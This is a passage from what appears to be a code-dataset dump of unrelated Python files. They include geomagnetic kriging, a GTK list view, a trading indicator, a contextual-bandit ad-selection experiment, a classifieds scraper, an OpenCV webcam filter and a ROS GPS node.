json\nimport pykrige.kriging_tools as kt\nfrom pykrige.ok import OrdinaryKriging\nfrom .filepaths import full_dataset_filepath, holed_dataset_filepath\nfrom .canadas_coordinates import *\nfrom .dataset_columns import *\nfrom backend_implementation.holed_data import HoledData\nfrom backend_implementation.full_data import FullData\n\nclass Kriging():\n\n\tdef __init__(self, index, data):\n\t\tself.moving_avg_size = 2\n\t\tself.sites_output_df = None\n\t\tself.data_moving_avg = self.calculate_moving_average(data)\n\t\tself.kriging_output = self.perform_kriging(index, data)\n\t\tself.kriging_output_json = self.structure_output_as_json(self.kriging_output)\n\n\tdef calculate_moving_average(self, data):\n\t\t# After experiementing with different sizes, it was found that using a moving average over every 2 samples \n\t\t# led to the best performing kriging model. Moving average: https://en.wikipedia.org/wiki/Moving_average\n\t\treturn data.df.rolling(self.moving_avg_size).mean()\n\n\tdef perform_kriging(self, index, data):\n\t\tcurrent_date = str(data.dataset_df['DD-HH'][index]);\n\n\t\t# Since we are using a rolling average, the average of the first moving_avg_size - 1 rows will be NaN.\n\t\t# Hence, we use the first non-NaN row from the dataset to determine the magnetic field.\n\t\tif index < (self.moving_avg_size - 1):\n\t\t\tindex = self.moving_avg_size - 1\n\n\t\t# Perform Ordinary Kriging: https://pykrige.readthedocs.io/en/latest/overview.html#ordinary-kriging-example\n\t\tOK = OrdinaryKriging(data.longitudes, data.latitudes, data.df.loc[index], variogram_model='spherical', \n\t\t\tverbose=False, enable_plotting=False, coordinates_type='geographic')\n\t\tz1, ss1 = OK.execute('grid', data.longitude_grid, data.latitude_grid)\n\n\t\t# These values are the indinces (long,lat) which correspond to the magnetic field reading at the site MEA\n\t\tindex_of_mea_longitude = np.where(data.longitude_grid == mea_longitude)[0][0]\n\t\tindex_of_mea_latitude = np.where(data.latitude_grid == mea_latitude)[0][0]\n\n\t\t# z1 is a masked array of size len(latitude_grid) x len(longitude_grid) containing the interpolated values.\n\t\t# Hence, we access the value at MEA's coordinates as z1[lat][long] instead of z1[long][lat].\n\t\tpredicted_value = round(z1.data[index_of_mea_latitude][index_of_mea_longitude], 2)\n\n\t\tif isinstance(data, FullData):\n\t\t\tself.sites_output_df = self.build_sites_output_dataframe(index, data, full_dataset_site_names, predicted_value)\n\t\t\ttarget_value = data.target.loc[index]['MEA']\n\t\telse:\n\t\t\tself.sites_output_df = self.build_sites_output_dataframe(index, data, holed_dataset_site_names, predicted_value)\n\t\t\ttarget_value = r'N/A'\n\n\t\t# Return z1.data, sites_output_df, predicted value and target_value as a dictionary. This information will\n\t\t# be passed onto the user's browser, where is will be used to visualise the data on maps.\n\t\treturn_values = {}\n\t\treturn_values['prediction_grid'] = z1.data\n\t\treturn_values['sites_output_df'] = self.sites_output_df\n\t\treturn_values['predicted_value'] = predicted_value\n\t\treturn_values['target_value'] = target_value\n\t\treturn_values['current_date'] = current_date\n\t\treturn return_values\n\n\n\tdef build_sites_output_dataframe(self, index, data, sites, predicted_value):\n\t\tsites_df = pd.DataFrame(columns=['site_name', 'magnetic_field_variation', 'longitude', 'latitude'])\n\n\t\t# Create a dataframe containing information about each site and it's magnetic field variation value\n\t\t# on the given DD-HH. This information will be visualised on a map in the browser window.\n\t\tfor site in sites:\n\t\t\tname = site\n\t\t\tvalue = data.dataset_df[site][index]\n\t\t\tlongitude = data.dataset_df[site + \"_lon\"][index]\n\t\t\tlatitude = data.dataset_df[site + \"_lat\"][index]\n\t\t\tsites_df = sites_df.append(pd.Series([name, value, longitude, latitude], index=sites_df.columns), ignore_index=True)\n\n\t\t# Explicitly add a row for the MEA site as the column has been removed/is unavailable in the datasets\n\t\tname = target_columns[0] # MEA\n\t\tvalue = predicted_value\n\t\tlongitude = mea_longitude\n\t\tlatitude = mea_latitude\n\t\tsites_df = sites_df.append(pd.Series([name, value, longitude, latitude], index=sites_df.columns), ignore_index=True)\n\t\treturn sites_df\n\n\tdef structure_output_as_json(self, kriging_output):\n\t\tjson_response_obj = {}\n\n\t\t# dict object containing magnetic field variation values of the MEA site\n\t\ttarget_site_dict = {\n\t\tr'site': target_columns[0], \n\t\tr'predicted_value': kriging_output['predicted_value'], \n\t\tr'target_value': kriging_output['target_value']\n\t\t}\n\n\t\t# dict object containing information about all sites\n\t\tsites_data = []\n\t\tsites_df = kriging_output['sites_output_df']\n\t\tfor index, row in sites_df.iterrows():\n\t\t\tsite = {}\n\t\t\tsite[r'name'] = row['site_name']\n\t\t\tsite[r'value'] = row['magnetic_field_variation']\n\t\t\tsite[r'lon'] = row['longitude']\n\t\t\tsite[r'lat'] = row['latitude']\n\t\t\tsites_data.append(site)\n\t\t\n\n\t\t# dict containing information about all coordinates from the grid spanning across Canada\n\t\tgrid = kriging_output['prediction_grid']\n\t\tlatitude = southern_most_latitude\n\t\tlongitude = western_most_longitude\n\t\tacross_canada_data = []\n\t\tfor row in grid:\n\t\t\tfor value in row:\n\t\t\t\tlocation_dict = {}\n\t\t\t\tlocation_dict[r'lon'] = longitude\n\t\t\t\tlocation_dict[r'lat'] = latitude\n\t\t\t\tlocation_dict[r'value'] = round(value, 2)\n\t\t\t\tacross_canada_data.append(location_dict)\n\t\t\t\tlongitude = longitude + 0.5\n\t\t\tlongitude = western_most_longitude\n\t\t\tlatitude = latitude + 0.5\n\n\t\t# dict containing the dimensions of the sites_output_df.\n\t\t# This is used to determine the boundaries of polygons in the heat map.\n\t\tgrid_dimensions = {'rows': kriging_output['prediction_grid'].shape[0], 'columns': kriging_output['prediction_grid'].shape[1]}\n\t\t\n\t\t# Generate a dict consisting of the above 3 JSON objects and return it to the browser.\n\t\tjson_response_obj['current_date'] = kriging_output['current_date']\n\t\tjson_response_obj[r'target_site'] = target_site_dict\n\t\tjson_response_obj[r'sites_data'] = sites_data\n\t\tjson_response_obj[r'across_canada_data'] = across_canada_data\n\t\tjson_response_obj[r'grid_dimensions'] = grid_dimensions\n\n\t\t# Don't do a json.dumps() here because it leads to escape characters being inserted when the \n\t\t# objects is unpacked as a JSON object in Jinja2 template using the 'tojson' method. Hence,\n\t\t# pass it to the browser as a mapping (i.e dict obj) and unpack it as a JSON directly.\n\t\treturn json_response_obj\n","repo_name":"Joshua-Swain/mapping-canadian-geomagnetic-activity","sub_path":"code/mainapp/backend_implementation/kriging.py","file_name":"kriging.py","file_ext":"py","file_size_in_byte":6374,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"7553188361","text":"from main import HOME\n\nimport gtk\nimport gobject\n\n\n\n#\n# Class for a list of items.\n#\nclass ListView(gtk.TreeView):\n\n def __init__(self, columntypes, renderer):\n\n self.__items = {}\n self.__renderer = renderer\n\n\n gtk.TreeView.__init__(self)\n self.__liststore = gtk.ListStore(*columntypes)\n\n self.set_model(self.__liststore)\n self.set_headers_visible(False)\n\n cnt = 0\n for ctype in columntypes:\n if (ctype == gtk.gdk.Pixbuf):\n col = gtk.TreeViewColumn(None, gtk.CellRendererPixbuf(),\n pixbuf = cnt)\n elif (ctype == gobject.TYPE_STRING):\n col = gtk.TreeViewColumn(None, gtk.CellRendererText(),\n markup = cnt)\n \n self.append_column(col)\n cnt += 1\n #end for\n \n\n\n\n #\n # Clears the list.\n #\n def clear(self):\n\n self.__items = {}\n self.__liststore.clear()\n self.set_size_request(-1, -1)\n import gc; gc.collect()\n\n\n #\n # Returns the selected item or None.\n #\n def get_selected_item(self):\n\n path = self.get_cursor()[0]\n return self.__items.get(path)\n\n\n #\n # Selects the given item.\n #\n def select_item(self, item):\n\n for path, i in self.__items.items():\n if (item == i):\n self.set_cursor(path, None, False)\n break\n #end for\n\n\n\n #\n # Adds as item to the list.\n #\n def add_item(self, item):\n\n values = self.__renderer(item)\n\n iter = self.__liststore.append()\n for i in range(len(values)):\n self.__liststore.set(iter, i, values[i])\n\n path = self.__liststore.get_path(iter)\n self.__items[path] = item\n","repo_name":"RaumZeit/gdesklets-core","sub_path":"shell/ListView.py","file_name":"ListView.py","file_ext":"py","file_size_in_byte":1820,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"38190776481","text":"import numpy as np\nimport pandas as pd\n\n\nclass Dema:\n\n def __init__(self, historical_data, time_period=200, column=\"close\"):\n\n self.historical_data = historical_data\n self.time_period = time_period\n self.column = column\n\n def prev(self):\n\n ema = self.historical_data[self.column].ewm(\n span=self.time_period, adjust=False).mean()\n\n dema = 2 * ema - \\\n ema.ewm(span=self.time_period, adjust=False).mean()\n\n return dema\n\n def next(self, realtime_data):\n\n split_data = self.historical_data.tail(self.time_period - 1)\n split_data = pd.concat([split_data, realtime_data])\n\n ema = split_data[self.column].ewm(\n span=self.time_period, adjust=False).mean()\n\n dema = 2 * ema - \\\n ema.ewm(span=self.time_period, adjust=False).mean()\n\n return dema\n","repo_name":"PhoenixGamesComp/TradingBotV3","sub_path":"indicators/dema.py","file_name":"dema.py","file_ext":"py","file_size_in_byte":867,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"20866859009","text":"class Bank:\n def __init__(self,name,accNo,accType,bal):\n self.name=name\n self.accNo=accNo\n self.accType=accType\n self.bal=bal\n\n def deposit(self,depAmt):\n self.depAmt=self.bal+depAmt\n print(\"Amount deposited: \",depAmt)\n self.bal=self.bal+depAmt\n print(\"Total available balance=\",self.bal)\n \n def withdraw(self,withAmt):\n self.withAmt=self.bal-withAmt\n print(\"Amount withdrawn: \",withAmt)\n self.bal=self.bal-withAmt\n print(\"Total available balance=\",self.bal)\n \n\n def showBal(self):\n print(\"Total available balance=\",self.bal)\n\n \nbal=0\nchoice=0\naccNum=input(\"Enter the name:\")\naccNo=int(input(\"Enter your account number:\"))\naccType=input(\"Enter your account type:\")\ncust1=Bank(accNum,accNo,accType,bal)\nwhile(choice!=4):\n choice=int(input(\"Enter your choice: \\n1. Deposit\\n2.Withdraw\\n3.Check Balance\\n4.Exit\"))\n\n if(choice==1):\n depAmt=int(input(\"Enter how much amount you want to deposit\\n\"))\n cust1.deposit(depAmt)\n elif(choice==2):\n withAmt=int(input(\"Enter how much amount you want to withdraw\\n\"))\n cust1.withdraw(withAmt)\n elif(choice==3):\n cust1.showBal()\n\n\n\n \n","repo_name":"shiva2230/PythonLab","sub_path":"CO4/bank.py","file_name":"bank.py","file_ext":"py","file_size_in_byte":1246,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"13759335779","text":"import argparse\r\n\r\ndef calculate_cost(version, tokens):\r\n cost_per_thousand = {\r\n 'gpt3.5t': 0.002,\r\n 'gpt4': 0.03\r\n }\r\n\r\n if version not in cost_per_thousand:\r\n print(f\"Invalid version: {version}\")\r\n return\r\n\r\n cost = (tokens / 1000) * cost_per_thousand[version]\r\n\r\n print(f\"The cost for {tokens} tokens using {version} is ${cost:.2f}\")\r\n\r\nif __name__ == \"__main__\":\r\n parser = argparse.ArgumentParser(description='Calculate API token costs.')\r\n parser.add_argument('version', type=str, help='The API version. Either \"gpt3.5t\" or \"gpt4\".')\r\n parser.add_argument('tokens', type=int, help='The number of tokens.')\r\n \r\n args = parser.parse_args()\r\n\r\n calculate_cost(args.version, args.tokens)\r\n","repo_name":"NickWithBotronics/OpenAI-API-Calculator","sub_path":"Script.py","file_name":"Script.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"32044995359","text":"from bs4 import BeautifulSoup\nimport requests\nimport time\n\n\nurl = 'http://bj.58.com/pbdn/?PGTID=0d100000-0000-1121-f41b-137aeef068b7&ClickID=6'\n\nurl1 = 'http://jst1.58.com/counter?infoid='\n\n\n#u1 = 'http://bj.58.com/pingbandiannao/24063001373753x.shtml?adtype=1&PGTID=0d305a36-0000-15fc-9fd4-6d9b525b011f&entinfo=24063001373753_0&psid=115136530190322804712479354&iuType=q_2&ClickID=13'\n\n\n\n\n\ndef get_JS_link(content1,content2):\n\n startIndex = content1.index('entinfo') + 8\n endIndex = startIndex + 14\n JS_link = content2 + content1[startIndex:endIndex]\n return (JS_link)\n\n\n\ndef get_viewCount(url):\n web_data = requests.get(url)\n soup = BeautifulSoup(web_data.text, 'lxml')\n views = soup.select('body')\n count = str(views[0])\n start = count.index('total') + 6\n end = count.index('

')\n viewCount = count[start: end]\n return viewCount\n\n\n\ndef get_detailedInfo(url, detailedData=None):\n\n web_data = requests.get(url)\n soup = BeautifulSoup(web_data.text, 'lxml')\n\n dates = soup.select('ul.mtit_con_left.fl > li.time')\n prices = soup.select('div.person_add_top.no_ident_top > div.per_ad_left > div.col_sub.sumary > ul > li > div.su_con > span.price.c_f50')\n types = soup.select('div.num_tan > div.num_tan_in > div.num_tan_main > div.num_tan_text > p.c_666 > span.red')\n areas = soup.select('div.person_add_top.no_ident_top > div.per_ad_left > div.col_sub.sumary > ul > li > div.su_con > span > a:nth-of-type(1)')\n\n decide = soup.select('div.person_add_top.no_ident_top > div.per_ad_left > div.col_sub.sumary > ul > li > div.su_tit')\n\n list=[]\n for dec in decide:\n dec = dec.get_text()\n list.append(str(dec[0:2]))\n\n if detailedData==None:\n\n if '区域' in list:\n\n for date, price, type, area in zip(dates, prices, types,areas):\n\n view_url = get_JS_link(url,url1)\n viewCount = get_viewCount(view_url)\n\n type = type.get_text().strip()\n\n if len(type[1:-1]) == 0:\n detailedData = {\n 'viewCount': viewCount,\n 'date': date.get_text(),\n 'price': price.get_text(),\n 'type': '个人',\n 'area': area.get_text()\n }\n else:\n detailedData = {\n 'viewCount': viewCount,\n 'date': date.get_text(),\n 'price': price.get_text(),\n 'type': type[1: -1],\n 'area': area.get_text()\n }\n\n return detailedData\n\n else:\n\n for date, price, type in zip(dates, prices, types):\n\n view_url = get_JS_link(url,url1)\n viewCount = get_viewCount(view_url)\n\n type = type.get_text().strip()\n\n if len(type[1:-1]) == 0:\n detailedData = {\n 'viewCount': viewCount,\n 'date': date.get_text(),\n 'price': price.get_text(),\n 'type': '个人',\n 'area': 'not mentioned'\n }\n else:\n detailedData = {\n 'viewCount': viewCount,\n 'date': date.get_text(),\n 'price': price.get_text(),\n 'type': type[1:-1],\n 'area': 'not mentioned'\n }\n\n return detailedData\n\n\n\ndef get_info(url, data=None):\n\n time.sleep(2)\n n = 0\n\n web_data = requests.get(url)\n soup = BeautifulSoup(web_data.text, 'lxml')\n titles = soup.select('td.t > a.t')\n\n if data==None:\n for title in titles:\n\n data = {\n 'title': title.get_text().strip()\n }\n\n homepage = title.get('href')\n detailedData = get_detailedInfo(homepage)\n\n print(data)\n print(detailedData)\n n += 1\n print (n, '--------------------------------------------- \\n')\n\n\nget_info(url)\n\n","repo_name":"circlechai/Plan-for-combating","sub_path":"week1大作业提交/litong/58.py","file_name":"58.py","file_ext":"py","file_size_in_byte":4163,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"7"} +{"seq_id":"5123868044","text":"#----condiciones---#\nmensaje_binevenida = \"hola que se dice pa \"\nmensaje_mayor = \" a es mayor \"\nmensaje_menor =\"a es menor \"\nmensaje_igual = \" son igual \"\n\nMENSAJE_A = \"ingrese un numero A :\"\nMENSAJE_B= \"ingrese un numero B: \"\n#----CODIGO----\nprint (mensaje_binevenida)\nA = int (input (MENSAJE_A))\nB = int (input (MENSAJE_B))\nismayor = A > B\nismenor = A < B\nisigusl = A == B\nresultado = \"\"\nif (ismayor):\n print (mensaje_mayor)\nelif (ismenor):\n print (mensaje_menor)\nelse :\n print (mensaje_igual)\n\nprint (resultado)\n\n\n\n\n","repo_name":"geronimo0630/2021","sub_path":"talleres/estudioparcial1.1.py","file_name":"estudioparcial1.1.py","file_ext":"py","file_size_in_byte":533,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"6279943962","text":"from datetime import date\nimport cv2\nimport numpy\n\n# img = cv2.imread('./src/img/image.jpeg')\n\n# img = cv2.resize(img, (img.shape[1]*2, img.shape[0]*2))\n\n# img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\n\n# # img = cv2.GaussianBlur(img, (15, 15), 0)\n\n# cv2.imshow('kitten',img)\n\n\n# cv2.waitKey(0)\n\ncap = cv2.VideoCapture(0)\n\nwhile True:\n success, img = cap.read()\n img = cv2.resize(img, (1280, 720))\n img = cv2.rotate(img, cv2.ROTATE_180)\n img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\n img = cv2.Canny(img, 15, 15)\n kernel = numpy.ones((3,3), numpy.uint8)\n img = cv2.dilate(img, kernel, iterations=1)\n\n img = cv2.erode(img, kernel, iterations=1)\n\n cv2.imshow('ok', img)\n\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break","repo_name":"fenix1851/OpenCV-course","sub_path":"test/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":750,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"1919349046","text":"import argparse\n#import pyprofiler\n\ndef read_large_file(file):\n with open(file) as f:\n for line in f:\n yield line\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"Read a large file efficiently\")\n parser.add_argument('filename', help='filename')\n args = parser.parse_args()\n #profiler = pyprofiler.start_profile()\n reader = read_large_file(args.filename)\n while True:\n try:\n print(next(reader))\n except StopIteration:\n break\n #pyprofiler.end_profile(profiler)\n","repo_name":"earankyk/snippets","sub_path":"large_file.py","file_name":"large_file.py","file_ext":"py","file_size_in_byte":563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"33458181423","text":"\n\nimport numpy as np\nimport pandas as pd\nimport time\nimport matplotlib.pyplot as plt\nimport geopy.distance\nimport ast\nimport nltk\nimport math\nnltk.download('punkt')\nnltk.download('stopwords')\nfrom nltk.corpus import stopwords\nimport string\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn import datasets\nfrom scipy.special import expit\nimport random\n\n\nad = pd.read_csv('ads.csv',encoding='iso-8859-1')[:50]\nsrch = pd.read_csv('search.csv',encoding='iso-8859-1')[:10000]\n\nclass Search:\n def __init__(self,search):\n self.n = len(search)\n self.loc = search[['Latitude', 'Longitude']]\n self.text = search[['SearchParams', 'SearchQuery']]\n self.corp = [ [i for i in nltk.word_tokenize(sent.lower()) if i not in Operations.stop()] for sent in self.text.apply(Operations.vectorize,axis=1).tolist()]\n self.budget = search.Budget.tolist()\n self.t = 0\n \n def getNextRow(self):\n self.t+=1\n return (self.loc.iloc[self.t-1], self.corp[self.t-1], self.budget[self.t-1])\n \n def getRow(self, index):\n return (self.loc[index], self.corp[index], self.budget[index])\n\nclass Ads:\n def __init__(self,ads):\n self.n = len(ads)\n self.loc = ads[['Latitude', 'Longitude']]\n self.text = ads[['Params', 'Title']]\n self.corp = [ [i for i in nltk.word_tokenize(sent.lower()) if i not in Operations.stop()] for sent in self.text.apply(Operations.vectorize,axis=1).tolist()]\n self.price = ads.Price.tolist()\n \n def getRow(self, index):\n return (self.loc.iloc[index], self.corp[index], self.price[index])\n\nclass Context:\n def __init__(self):\n arrs = np.load('arrs.npy')\n words = np.load('words.npy')\n self.vec_dict = dict(zip(words, arrs)) \n global ad \n self.ads = Ads(ad)\n self.ad_centroids = [self.computeCentroid(self.ads.getRow(i)[1]) for i in range(self.ads.n)]\n self.max_geo_distance=Operations.computeDistance(50,30,70,140)\n global srch\n self.max_srch_budget=max(srch.Budget)\n #global srch\n self.min_srch_budget=min(srch.Budget)\n self.max_ad_price=max(self.ads.price)\n self.min_ad_price=min(self.ads.price)\n self.weights = np.array([5, 2, 1])\n self.w_sum = sum(self.weights)\n \n def computeCentroid(self,query):\n return np.mean(np.array([self.vec_dict[word] for word in query]), axis = 0)\n \n def getContext(self,ad_id,search_tuple):\n \n centroidDistance = 1 - self.getCentroidDistance(ad_id,search_tuple[1])\n if centroidDistance < 0:\n centroidDistance = 0\n return np.array([(self.weights[0]/self.w_sum)*centroidDistance, (self.weights[1]/self.w_sum)*(1-self.getLocationDistance(ad_id,search_tuple[0])), (self.weights[2]/self.w_sum)*(1-self.getBudgetDistance(ad_id,search_tuple[2]))])\n \n \n def getCentroidDistance(self, ad_id,query):\n query_centroid=self.computeCentroid(query)\n return np.linalg.norm(query_centroid-self.ad_centroids[ad_id]) #(np.sqrt(len(query_centroid)*4)\n \n def getLocationDistance(self, ad_id,search_location):\n ad_location=self.ads.getRow(ad_id)[0]\n distance=Operations.computeDistance(ad_location[0],ad_location[1],search_location[0],search_location[1])\n return distance/self.max_geo_distance\n \n def getBudgetDistance(self, ad_id,search_budget):\n return np.linalg.norm(search_budget-self.ads.getRow(ad_id)[2])/(max(self.max_srch_budget-self.min_ad_price, self.max_ad_price-self.min_srch_budget))\n\nclass Bandit(object):\n\n def generate_reward(self, i):\n raise NotImplementedError\n\n\nclass BernoulliBandit(Bandit):\n\n def __init__(self, n=10):\n global ad\n self.ads=ad\n self.n = n\n self.d = 3\n #self.theta = np.random.rand(self.d, self.n)\n self.bias, self.theta=self.generate_thetas()\n self.x = np.random.rand(self.d, self.n)\n print ('\\n\\noptimal theta :\\n', self.theta)\n #print ('\\n\\nproduct : \\n', (np.matmul(np.transpose(self.x), self.theta)*np.eye(self.n)).sum(axis = 0))\n self.avg_reward = [0 for _ in range(self.n)]\n self.counts = [0 for _ in range(self.n)]\n self.m = int(0.1*len(self.ads))\n \n\n def generate_reward(self, i_arr, x, sleep):\n\n proba_vector=expit((np.matmul(np.transpose(x), self.theta)*np.eye(self.n)).sum(axis = 0)+self.bias)\n proba_vector = proba_vector * sleep\n best_probas = np.sort(proba_vector)[::-1][:self.m]\n rewards = np.array([1 if np.random.random() < proba_vector[i] else 0 for i in i_arr])\n chosen_probas = np.array([proba_vector[i] for i in i_arr])\n \n return rewards, sum(best_probas) - sum(chosen_probas)\n \n def generate_thetas(self): \n ctrs=[x*50 for x in self.ads.HistCTR.tolist()]\n\n context = Context()\n thetas = np.zeros((self.d,self.n))\n w = [1,1,1]\n w_sum = sum(w)\n bias = np.zeros(self.n)\n for i in range(self.n):\n res = math.log(ctrs[i]/(1-ctrs[i]))\n thetas[:, i] = [weight/w_sum for weight in w] \n bias[i] = res - np.dot(context.weights,thetas[:,i])/context.w_sum\n return bias,thetas\n\nclass Operations:\n \n @staticmethod\n def vectorize(row):\n cell=row[0]\n vector=[]\n if cell is not None:\n cell = ast.literal_eval(cell)\n assert(type(cell)==dict)\n \n vector=list(cell.values())\n if row[1] is not None:\n vector.append(row[1])\n \n return \" \".join(vector).lower()\n\n \n @staticmethod\n def computeDistance(lat1, long1, lat2, long2):\n coords_1 = (lat1, long1)\n coords_2 = (lat2, long2)\n\n return geopy.distance.distance(coords_1,coords_2).km\n \n @staticmethod\n def stop():\n return stopwords.words('english') + list(string.punctuation) + [\"''\", \"'s\"]\n\nclass LogisticUCB(object):\n def __init__(self, bandit, dimensions=3, delta=1):\n \"\"\"\n bandit (Bandit): the target bandit to solve.\n \"\"\"\n assert isinstance(bandit, BernoulliBandit)\n np.random.seed(int(time.time()))\n\n self.bandit = bandit\n\n #self.chosen_arms = [] # A list of machine ids, 0 to bandit.n-1.\n self.regret = 0. # Cumulative regret.\n self.regrets = [0.] # History of cumulative regret.\n self.k = self.bandit.n\n self.d = dimensions\n self.t = 0\n \n self.theta = np.zeros((self.d,self.k)) \n self.p = np.zeros(self.k)\n self.r = [np.random.random()/10 for _ in range(self.k)]\n self.alpha = 1.1 #+ np.sqrt(np.log(2/delta)/2)\n self.eta = 10000\n\n self.x = np.zeros((self.d, self.k))\n self.q = [0 for _ in range(self.k)]\n self.d_csmab = [0 for _ in range(self.k)]\n self.logregs = [LogisticRegression(C=1e7, solver='lbfgs') for _ in range(self.k)]\n self.q_tanh = [0 for _ in range(self.k)]\n \n #print ('\\n\\nx : \\n', self.x)\n #print ('search')\n \n \n self.counts = [2 for _ in range(self.k)]\n global srch\n self.search = Search(srch)\n self.context = Context()\n self.A = np.array([np.identity(self.d) for _ in range(self.k)])\n \n \n def update_regret(self, diff):\n self.regret += diff/len(self.bandit.ads)\n self.regrets.append(self.regret)\n\n @property\n def estimated_probas(self):\n raise NotImplementedError\n\n def run_one_step(self):\n \"\"\"Return the machine index to take action on.\"\"\"\n self.t += 1\n \n #self.x = np.random.rand(self.d,self.k)\n query = self.search.getNextRow()\n\n while True:\n self.sleep = np.array([random.choice([0, 1, 1, 1]) for _ in range(self.bandit.n)])\t\n if(sum(self.sleep)>0):\n break\n \n for i in range(self.bandit.n):\n self.q[i] = max(0, (self.q[i] + self.r[i]*sum(self.x[:,i]) - self.d_csmab[i]))\n \n self.q_tanh = np.tanh(self.q)\n self.x = np.transpose(np.array([self.context.getContext(i, query) for i in range(self.k)]))\n\n logreg_score=[0 for _ in range(self.k)]\n for i in range(self.k):\n inverse=np.linalg.inv(self.A[i])\n if self.counts[i]!=2:\n self.p[i] = self.eta*expit(np.dot(self.x[:, i], np.ravel(self.logregs[i].coef_))+self.logregs[i].intercept_)\n logreg_score[i]=self.p[i]\n\n self.p[i] += self.eta*self.alpha*(np.sqrt(np.matmul(np.matmul(np.transpose(self.x[:,i]),inverse),self.x[:,i]))) + self.q_tanh[i]*sum(self.x[:,i])\n else:\n #self.p[i] = self.alpha*(np.sqrt(np.matmul(np.matmul(np.transpose(self.x[:,i]),np.eye(self.d)),self.x[:,i])))\n self.p[i] = self.eta*self.alpha*(np.sqrt(np.matmul(np.matmul(np.transpose(self.x[:,i]),inverse),self.x[:,i]))) + self.q_tanh[i]*sum(self.x[:,i])\n \n self.p = np.multiply(self.p, self.sleep) \n \n chosen_array = np.array(self.p.argsort()[-min(self.bandit.m, sum(self.sleep)):][::-1])\n #print(\"Chosen \", chosen_array)\n for chosen in chosen_array:\n self.A[chosen] = self.A[chosen] + np.matmul(np.reshape(self.x[:,chosen],(self.d,1)), np.reshape(self.x[:,chosen],(1,self.d)))\n self.d_csmab = [1 if _ in chosen_array else 0 for _ in range(self.k)]\n \n rewards, diff = self.bandit.generate_reward(chosen_array, self.x, self.sleep)\n self.train_update(chosen_array, rewards) \n return diff\n \n def train_update(self, chosen_array, rewards):\n for chosen in chosen_array:\n self.counts[chosen] += 1\n count = self.counts[chosen]\n self.trains[chosen][:,count-1] = self.x[:,chosen]\n self.tests[chosen][count-1] = rewards[np.argwhere(chosen_array == chosen)[0]]\n self.X_train = self.trains[chosen][:, :count]\n self.y_train = self.tests[chosen][:count]\n self.logregs[chosen] = LogisticRegression(C=1e7, solver='lbfgs')\n self.logregs[chosen].fit(np.transpose(self.X_train), self.y_train)\n \n \n def run(self, num_steps):\n assert self.bandit is not None\n self.time_steps = num_steps\n self.trains = np.array([np.zeros((self.d, num_steps+1)) for _ in range(self.k)])\n self.tests = np.array([np.zeros((num_steps+1)) for _ in range(self.k)])\n for k in range(self.k):\n self.trains[k,:,0] = self.context.weights/self.context.w_sum\n self.tests[k,0]=1\n if num_steps>self.search.n:\n num_steps = self.search.n\n for _ in range(num_steps):\n #if _%1000==0:\n print('\\n\\n\\nstep : ', _+1 )\n diff = self.run_one_step()\n\n self.update_regret(diff)\n\ndef plot_results(regrets):\n\n fig = plt.figure(figsize=(10, 10))\n fig.subplots_adjust(bottom=0.3, wspace=0.3)\n\n ax1 = fig.add_subplot(111)\n ax1.plot(range(len(regrets)), regrets)\n\n ax1.set_xlabel('Time step')\n ax1.set_ylabel('Cumulative Regret')\n #ax1.legend(loc=9, bbox_to_anchor=(1.82, -0.25), ncol=5)\n ax1.legend(loc = 'best')\n ax1.grid('k', ls='--', alpha=0.3)\n\n plt.show()\n\nk = BernoulliBandit(n = len(ad))\n\nucb = LogisticUCB(k)\n\nucb.run(100)\n\nplot_results(ucb.regrets)\n","repo_name":"shreyasar2202/Multi-Armed-Bandits","sub_path":"CSMAB_F.py","file_name":"CSMAB_F.py","file_ext":"py","file_size_in_byte":11029,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"19567519213","text":"#!/usr/bin/env python3\n\nimport rospy\nimport serial\nimport utm\nfrom std_msgs.msg import Float64, Header, Int32, String\nfrom lab4.msg import gps_msg\n\n\nif __name__ == \"__main__\":\n\tSENSOR_NAME = \"GPS_PUCK\"\n\trospy.init_node(\"GPS_node\")\n\tserial_port = rospy.get_param('~port', '/dev/ttyUSB1')\n\tserial_baud = rospy.get_param('~baudrate', 4800)\n\t\n\tport = serial.Serial(serial_port, serial_baud, timeout=3.)\n\trospy.logdebug(\"Using GPS puck on port \" + serial_port + \" at \" + str(serial_baud))\n\t\n\tpub = rospy.Publisher(\"GPS_data\", gps_msg, queue_size=10)\n\n\t\n\ttry:\n\t\twhile not rospy.is_shutdown():\n\t\t\tline = port.readline()\n\n\t\t\tif line.startswith(b'$GPGGA'):\n\t\t\t\tline = str(line).split(\",\")\n\t\t\t\tmsg = gps_msg()\n\t\t\t\tif (line[2] == \"\"):\n\t\t\t\t\tcontinue;\n\t\t\t\tlat = float(line[2]) / 100.0\n\t\t\t\tlon = -float(line[4]) / 100 # plz dont take marks off grader, imma be in the western hemisphere for a while\n\t\t\t\talt = float(line[9])\n\t\t\t\t\n\n\t\t\t\t[easting, northing, zone, letter] = utm.from_latlon(lat, lon)\n\n\t\t\t\tmsg.lat = lat\n\t\t\t\tmsg.lon = lon\n\t\t\t\tmsg.alt = alt\n\t\t\t\tmsg.utm_easting = easting\n\t\t\t\tmsg.utm_northing = northing\n\t\t\t\tmsg.zone = zone\n\t\t\t\tmsg.letter = letter\n\t\t\t\t\n\t\t\t\tpub.publish(msg)\n\n\t\t\t\t\n\t\t\t\tprint(f\"lat, long, alt: {lat}, {lon}, 